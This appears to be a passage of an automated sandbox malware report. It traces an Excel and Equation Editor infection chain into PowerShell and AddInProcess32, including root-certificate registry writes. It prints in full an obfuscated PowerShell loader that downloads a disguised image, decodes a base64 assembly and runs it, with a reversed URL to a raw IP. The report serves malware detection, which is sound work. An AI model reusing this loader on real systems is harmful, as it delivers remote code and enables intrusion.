t'+'0vi'+'mageText.IndexOf(t0vstartFlag'+'); t0vendIndex = t0vimageText.Index'+'Of(t0vendFlag); if (t0vstartIndex '+'-g'+'e 0 -and t0vendIndex -gt t0vstartIndex) { '+'t0vstartIndex += t0vstartFlag.Length; t0vbase64L'+'ength = t0vendIndex - t0vstartIndex; t0vbase64Command'+' = t0vimageText.Substring(t0vstartIndex, t0vbase64Length); t0vcommandB'+'ytes = [Sy'+'stem.Convert]:'+':FromBase64String(t0vbase64Command); t0vloadedAssembly = [System.Reflection.Assembly]::Load(t0vcommandBytes); t0vtype = t0vloadedAssembly.'+'GetType(AmaRunPE.HomeAma); t0vmethod ='+' t0vtype.GetMet'+'hod(AmaVAIAma).Invoke(t0vnull,'+' [ob'+'ject[]] (Amatxt.esabla'+'noitidarTruo/651.342.'+'3.291//:ptthAma , AmadesativadoAma , AmadesativadoAma , AmadesativadoAma,AmaAddInProcess32Ama,AmadesativadoAma)) } }').RepLAce('t0v','$').RepLAce(([ChaR]65+[ChaR]109+[ChaR]97),[STrINg][ChaR]39) )"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ".( $pSHoMe[21]+$pShome[34]+'x') ( ('t0vlink = Amahttps://uploadde'+'imagens.com.br/images/004/807/053/origin'+'al/new_image.jpg?1719846235Ama; t0vwebClient = New-Object System.Net.WebClient; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch'+' { Write-Host AmaFailed To do'+'wnload data from t0vlin'+'kAma -ForegroundColor Red'+'; exit }; if ('+'t0vdownloadedData -ne t0vnull) { t0vimageText = [System.Text.Encoding]::UT'+'F8.GetString(t0vdownloadedData); t0vstartFlag = Ama<<BASE64_START>>Ama; t0vendFlag = Ama<<BASE64_END>>Ama; t0vstartIndex = t0vimageText.IndexOf(t0vstartFlag); t0vendIndex = t0vimageText.IndexOf(t0vendFlag); if (t0vstartIndex -ge 0 -and t0vendIndex -gt t0vstart'+'Index) { t0vstartIndex += t0vstartF'+'lag.Length; t0vbase64Len'+'gth = t0vendIndex - t0vstartIndex; t0vba'+'se64Command = t0vimageText.Substring(t0vstartIndex, t0vb'+'ase64Length); t0vcommandBytes = [System.Convert]::FromBase64String(t0vbase64C'+'ommand); t0vloadedAssembly = [System.Reflection.As'+'sembly]::Load(t0vcommandBytes); t0vtype = t'+'0vloadedAssembly.GetType('+'AmaRunPE.HomeAma); t0vmethod = t0vtype.GetMethod(AmaVAIAma).Invoke(t'+'0vnull, [object[]] (Amatxt.esablanoitidarTruo/651'+'.342.3.291//:ptthAma , '+'AmadesativadoAma , AmadesativadoAma'+' , Amade'+'sativadoAma,AmaAddInPro'+'cess32Ama,AmaAma)) } }Set Scriptblock t0vlink = Amahttps://uploaddeimage'+'ns.com.br/images/004/806/083/original/new_image.jpg?1719607612Am'+'a; t0vwebClient = New-O'+'bject System.Net.WebClien'+'t; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch { Write-Host AmaFailed To download data from t0vlinkAma -ForegroundColor Red; exit }; if (t0vdownloadedData -ne t0vnull) { t0vimageText = [System.Text.Encoding]::UTF8.'+'GetString(t0vdownloadedData); t0vstartFlag '+'= Ama<<BASE64_START>>Ama; t0vendFlag = Ama<<BASE64_END'+'>>Ama; t0vstartIndex = t'+'0vi'+'mageText.IndexOf(t0vstartFlag'+'); t0vendIndex = t0vimageText.Index'+'Of(t0vendFlag); if (t0vstartIndex '+'-g'+'e 0 -and t0vendIndex -gt t0vstartIndex) { '+'t0vstartIndex += t0vstartFlag.Length; t0vbase64L'+'ength = t0vendIndex - t0vstartIndex; t0vbase64Command'+' = t0vimageText.Substring(t0vstartIndex, t0vbase64Length); t0vcommandB'+'ytes = [Sy'+'stem.Convert]:'+':FromBase64String(t0vbase64Command); t0vloadedAssembly = [System.Reflection.Assembly]::Load(t0vcommandBytes); t0vtype = t0vloadedAssembly.'+'GetType(AmaRunPE.HomeAma); t0vmethod ='+' t0vtype.GetMet'+'hod(AmaVAIAma).Invoke(t0vnull,'+' [ob'+'ject[]] (Amatxt.esabla'+'noitidarTruo/651.342.'+'3.291//:ptthAma , AmadesativadoAma , AmadesativadoAma , AmadesativadoAma,AmaAddInProcess32Ama,AmadesativadoAma)) } }').RepLAce('t0v','$').RepLAce(([ChaR]65+[ChaR]109+[ChaR]97),[STrINg][ChaR]39) )"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0029A4C1 push esi; ret 6_2_0029A4D2
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0029A755 push ebx; ret 6_2_0029A756
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00298FC5 push eax; ret 6_2_00298FC6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_005B1850 pushad ; ret 8_2_005B1859
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_005B29B4 pushfd ; retf 8_2_005B29BD
                  Source: 6.2.powershell.exe.63545dc.3.raw.unpack, Home.csHigh entropy of concatenated method names: 'VAI', 'ReverseString', 'wj8oxcKQMhWyu3MiMB', 'eL61cEhr3TEsU6jQVJ', 'Xd0LwFzhEBVfQPGGSn', 'rQcd3TTSI6lCVHMl6JH', 'rbJryoTTdjpvdQgZCqq', 'WaP97STAZD9pAa0scHE', 'XMNkWLT7BBsCZiElwGi', 'yaMjewTLB6ko7gsuukK'
                  Source: 6.2.powershell.exe.63545dc.3.raw.unpack, RunPEE.csHigh entropy of concatenated method names: 'Ande', 'Run3', 'Run4', 'TryRun', 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'HandleRun', 'rBogTi80hXY4MBxwGs', 'oORNlfqPK7qWaCHWnV'
                  Source: 6.2.powershell.exe.63545dc.3.raw.unpack, Class2.csHigh entropy of concatenated method names: 'Start', 'sKo86fe9HGSnuwD9Ru', 'jdCsFhaPKJKkHAuFtI', 'ljlkD5QJDjiBlqQVUp', 'KoLdFvvo7Bp3WbpvJo', 'BKD5yIXBRqe4pqYdO2', 'O8M2MxIrcxBqL8Y6kA', 'FIoy5YnpW2lcjrJgZm', 'U7bGgk34FJ6pe9MuuE', 'qgy00q9HW7w1Ngk0MQ'
                  Source: 6.2.powershell.exe.270000.0.raw.unpack, Home.csHigh entropy of concatenated method names: 'VAI', 'ReverseString', 'wj8oxcKQMhWyu3MiMB', 'eL61cEhr3TEsU6jQVJ', 'Xd0LwFzhEBVfQPGGSn', 'rQcd3TTSI6lCVHMl6JH', 'rbJryoTTdjpvdQgZCqq', 'WaP97STAZD9pAa0scHE', 'XMNkWLT7BBsCZiElwGi', 'yaMjewTLB6ko7gsuukK'
                  Source: 6.2.powershell.exe.270000.0.raw.unpack, RunPEE.csHigh entropy of concatenated method names: 'Ande', 'Run3', 'Run4', 'TryRun', 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'HandleRun', 'rBogTi80hXY4MBxwGs', 'oORNlfqPK7qWaCHWnV'
                  Source: 6.2.powershell.exe.270000.0.raw.unpack, Class2.csHigh entropy of concatenated method names: 'Start', 'sKo86fe9HGSnuwD9Ru', 'jdCsFhaPKJKkHAuFtI', 'ljlkD5QJDjiBlqQVUp', 'KoLdFvvo7Bp3WbpvJo', 'BKD5yIXBRqe4pqYdO2', 'O8M2MxIrcxBqL8Y6kA', 'FIoy5YnpW2lcjrJgZm', 'U7bGgk34FJ6pe9MuuE', 'qgy00q9HW7w1Ngk0MQ'

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035205CF URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_035205CF
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
